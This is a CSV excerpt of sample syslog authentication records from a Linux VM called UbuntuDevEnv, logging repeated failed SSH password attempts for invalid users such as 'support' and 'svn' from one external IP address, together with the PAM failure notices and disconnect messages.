+3096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:22,UbuntuDevEnv,2019-06-28 05:26:22,auth,UbuntuDevEnv,info,Invalid user supervisor from 193.201.224.232 port 48547,95721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,193.201.224.2,48547,,
+3097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:23,UbuntuDevEnv,2019-06-28 05:26:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:23,UbuntuDevEnv,2019-06-28 05:26:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:24,UbuntuDevEnv,2019-06-28 05:26:24,auth,UbuntuDevEnv,info,Failed password for invalid user supervisor from 193.201.224.232 port 48547 ssh2,95721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,193.201.224.2,48547,,
+3100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:25,UbuntuDevEnv,2019-06-28 05:26:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:27,UbuntuDevEnv,2019-06-28 05:26:26,auth,UbuntuDevEnv,info,Failed password for invalid user supervisor from 193.201.224.232 port 48547 ssh2,95721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,193.201.224.2,48547,,
+3102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:31,UbuntuDevEnv,2019-06-28 05:26:31,auth,UbuntuDevEnv,info,"Disconnecting invalid user supervisor 193.201.224.232 port 48547: Change of username or service not allowed: (supervisor,ssh-connection) -> (support,ssh-connection) [preauth]",95721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,193.201.224.2,48547,,
+3103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:31,UbuntuDevEnv,2019-06-28 05:26:31,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:48,UbuntuDevEnv,2019-06-28 05:26:47,auth,UbuntuDevEnv,info,Invalid user support from 193.201.224.232 port 17309,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,17309,,
+3105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:49,UbuntuDevEnv,2019-06-28 05:26:48,auth,UbuntuDevEnv,info,Failed none for invalid user support from 193.201.224.232 port 17309 ssh2,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,17309,,
+3106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:49,UbuntuDevEnv,2019-06-28 05:26:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:49,UbuntuDevEnv,2019-06-28 05:26:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:51,UbuntuDevEnv,2019-06-28 05:26:50,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 17309 ssh2,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,17309,,
+3109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:01,UbuntuDevEnv,2019-06-28 05:27:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:04,UbuntuDevEnv,2019-06-28 05:27:03,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 17309 ssh2,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,17309,,
+3111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:06,UbuntuDevEnv,2019-06-28 05:27:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:08,UbuntuDevEnv,2019-06-28 05:27:07,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 17309 ssh2,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,17309,,
+3113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:08,UbuntuDevEnv,2019-06-28 05:27:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:10,UbuntuDevEnv,2019-06-28 05:27:10,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 17309 ssh2,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,17309,,
+3115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:10,UbuntuDevEnv,2019-06-28 05:27:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:12,UbuntuDevEnv,2019-06-28 05:27:12,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 17309 ssh2,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,17309,,
+3117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:12,UbuntuDevEnv,2019-06-28 05:27:12,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user support from 193.201.224.232 port 17309 ssh2 [preauth],95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,17309,,
+3118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:12,UbuntuDevEnv,2019-06-28 05:27:12,auth,UbuntuDevEnv,info,Disconnecting invalid user support 193.201.224.232 port 17309: Too many authentication failures [preauth],95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,193,,
+3119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:12,UbuntuDevEnv,2019-06-28 05:27:12,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+3120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:12,UbuntuDevEnv,2019-06-28 05:27:12,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95775,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:13,UbuntuDevEnv,2019-06-28 05:27:13,auth,UbuntuDevEnv,info,Invalid user support from 193.201.224.232 port 50928,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,50928,,
+3122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:14,UbuntuDevEnv,2019-06-28 05:27:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:14,UbuntuDevEnv,2019-06-28 05:27:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:16,UbuntuDevEnv,2019-06-28 05:27:16,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 50928 ssh2,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,50928,,
+3125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:16,UbuntuDevEnv,2019-06-28 05:27:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:18,UbuntuDevEnv,2019-06-28 05:27:18,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 50928 ssh2,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,50928,,
+3127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:19,UbuntuDevEnv,2019-06-28 05:27:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:21,UbuntuDevEnv,2019-06-28 05:27:21,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 50928 ssh2,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,50928,,
+3129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:21,UbuntuDevEnv,2019-06-28 05:27:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:23,UbuntuDevEnv,2019-06-28 05:27:22,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 50928 ssh2,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,50928,,
+3131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:23,UbuntuDevEnv,2019-06-28 05:27:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:25,UbuntuDevEnv,2019-06-28 05:27:24,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 50928 ssh2,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,50928,,
+3133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:25,UbuntuDevEnv,2019-06-28 05:27:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:28,UbuntuDevEnv,2019-06-28 05:27:27,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 50928 ssh2,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,50928,,
+3135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:28,UbuntuDevEnv,2019-06-28 05:27:27,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:28,UbuntuDevEnv,2019-06-28 05:27:27,auth,UbuntuDevEnv,info,Disconnecting invalid user support 193.201.224.232 port 50928: Too many authentication failures [preauth],95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,193,,
+3137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:28,UbuntuDevEnv,2019-06-28 05:27:27,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user support from 193.201.224.232 port 50928 ssh2 [preauth],95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,50928,,
+3138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:28,UbuntuDevEnv,2019-06-28 05:27:27,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,95902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+3139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:35,UbuntuDevEnv,2019-06-28 05:27:34,auth,UbuntuDevEnv,info,Invalid user support from 193.201.224.232 port 28706,95959,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,28706,,
+3140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:35,UbuntuDevEnv,2019-06-28 05:27:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95959,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:35,UbuntuDevEnv,2019-06-28 05:27:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95959,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:37,UbuntuDevEnv,2019-06-28 05:27:37,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 28706 ssh2,95959,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,28706,,
+3143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:37,UbuntuDevEnv,2019-06-28 05:27:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95959,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:40,UbuntuDevEnv,2019-06-28 05:27:39,auth,UbuntuDevEnv,info,Failed password for invalid user support from 193.201.224.232 port 28706 ssh2,95959,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,28706,,
+3145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:40,UbuntuDevEnv,2019-06-28 05:27:39,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95959,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:40,UbuntuDevEnv,2019-06-28 05:27:39,auth,UbuntuDevEnv,info,"Disconnecting invalid user support 193.201.224.232 port 28706: Change of username or service not allowed: (support,ssh-connection) -> (svin,ssh-connection) [preauth]",95959,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,193.201.224.2,193,,
+3147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:41,UbuntuDevEnv,2019-06-28 05:27:40,auth,UbuntuDevEnv,info,Invalid user svin from 193.201.224.232 port 2129,96007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svin,193.201.224.2,2129,,
+3148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:44,UbuntuDevEnv,2019-06-28 05:27:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:44,UbuntuDevEnv,2019-06-28 05:27:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:45,UbuntuDevEnv,2019-06-28 05:27:45,auth,UbuntuDevEnv,info,Failed password for invalid user svin from 193.201.224.232 port 2129 ssh2,96007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svin,193.201.224.2,2129,,
+3151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:48,UbuntuDevEnv,2019-06-28 05:27:47,auth,UbuntuDevEnv,info,"Disconnecting invalid user svin 193.201.224.232 port 2129: Change of username or service not allowed: (svin,ssh-connection) -> (svn,ssh-connection) [preauth]",96007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svin,193.201.224.2,2129,,
+3152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:48,UbuntuDevEnv,2019-06-28 05:27:48,auth,UbuntuDevEnv,info,Invalid user svn from 193.201.224.232 port 33047,96031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svn,193.201.224.2,33047,,
+3153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:49,UbuntuDevEnv,2019-06-28 05:27:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:49,UbuntuDevEnv,2019-06-28 05:27:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:51,UbuntuDevEnv,2019-06-28 05:27:51,auth,UbuntuDevEnv,info,Failed password for invalid user svn from 193.201.224.232 port 33047 ssh2,96031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svn,193.201.224.2,33047,,
